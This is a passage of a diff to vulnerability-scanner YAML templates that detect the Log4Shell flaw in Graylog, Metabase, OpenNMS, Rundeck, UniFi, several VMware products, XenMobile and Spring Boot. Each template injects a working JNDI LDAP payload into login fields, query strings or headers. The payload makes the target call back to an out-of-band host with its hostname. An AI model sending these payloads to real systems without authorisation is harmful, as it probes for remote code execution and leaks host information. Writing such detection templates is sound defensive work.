- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs 2022/10/10 # Enhanced by cs 2022/10/10

16
http/vulnerabilities/other/graylog-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}} Referer: {{BaseURL}}
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -44,7 +48,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: header part: header
@ -56,10 +60,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23 # Enhanced by md on 2023/03/23

16
http/vulnerabilities/other/metabase-log4j.yaml
View File

@ -20,10 +20,14 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}" - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -35,7 +39,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -47,8 +51,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true" verified: "true"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -29,7 +33,7 @@ http:
Referer: {{RootURL}}/opennms/login.jsp Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -41,17 +45,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs on 2022/10/23 # Enhanced by cs on 2022/10/23

16
http/vulnerabilities/other/rundeck-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Connection: close Connection: close
Referer: {{BaseURL}}/user/login Referer: {{BaseURL}}/user/login
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -42,7 +46,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: location part: location
@ -54,8 +58,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

20
http/vulnerabilities/other/unifi-network-log4j-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -31,7 +35,7 @@ http:
Origin: {{RootURL}} Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} {"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -43,13 +47,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/06/03 # Enhanced by mp on 2022/06/03

16
http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
View File

@ -21,10 +21,14 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D' - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -36,7 +40,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -48,8 +52,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/other/xenmobile-server-log4j.yaml
View File

@ -11,6 +11,10 @@ info:
shodan-query: title:"XenMobile" shodan-query: title:"XenMobile"
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -23,7 +27,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -35,7 +39,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -47,8 +51,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/springboot/springboot-log4j-rce.yaml
View File

@ -20,12 +20,16 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -37,17 +41,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/31 # Enhanced by mp on 2022/05/31

17
http/vulnerabilities/vmware/vmware-hcx-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
{ {
"authType": "password", "authType": "password",
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}", "username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
"password": "admin" "password": "admin"
} }
@ -46,16 +50,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/05 # Enhanced by md on 2022/10/05

16
http/vulnerabilities/vmware/vmware-nsx-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.jsp Referer: {{BaseURL}}/login.jsp
username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit= username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -42,7 +46,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: location part: location
@ -54,8 +58,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -33,7 +37,7 @@ http:
Sec-Fetch-Mode: cors Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin Sec-Fetch-Site: same-origin
mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -45,7 +49,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: header part: header
@ -57,8 +61,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

20
http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
Origin: {{RootURL}} Origin: {{RootURL}}
Referer: {{RootURL}}/ui/ Referer: {{RootURL}}/ui/
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -44,13 +48,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/04/05 # Enhanced by mp on 2022/04/05